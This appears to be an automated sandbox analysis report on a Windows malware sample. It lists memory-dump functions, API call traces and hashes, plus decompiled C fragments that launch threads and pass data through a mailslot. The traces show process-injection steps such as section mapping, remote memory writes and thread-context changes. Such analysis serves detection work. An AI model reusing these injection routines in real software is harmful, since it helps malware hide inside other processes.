  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 010.exe Analysis ID: 63143

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:39E01E2F5A5FBFECA5ABC01131E7E3A1
Total matches:33
Initial Analysis Report:Open
Initial sample Analysis ID:63143
Initial sample SHA 256:9F7B02032349637F0D8C962DAB2F08F0E3269C295AC0DE385C60274E89390D4B
Initial sample name:01.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
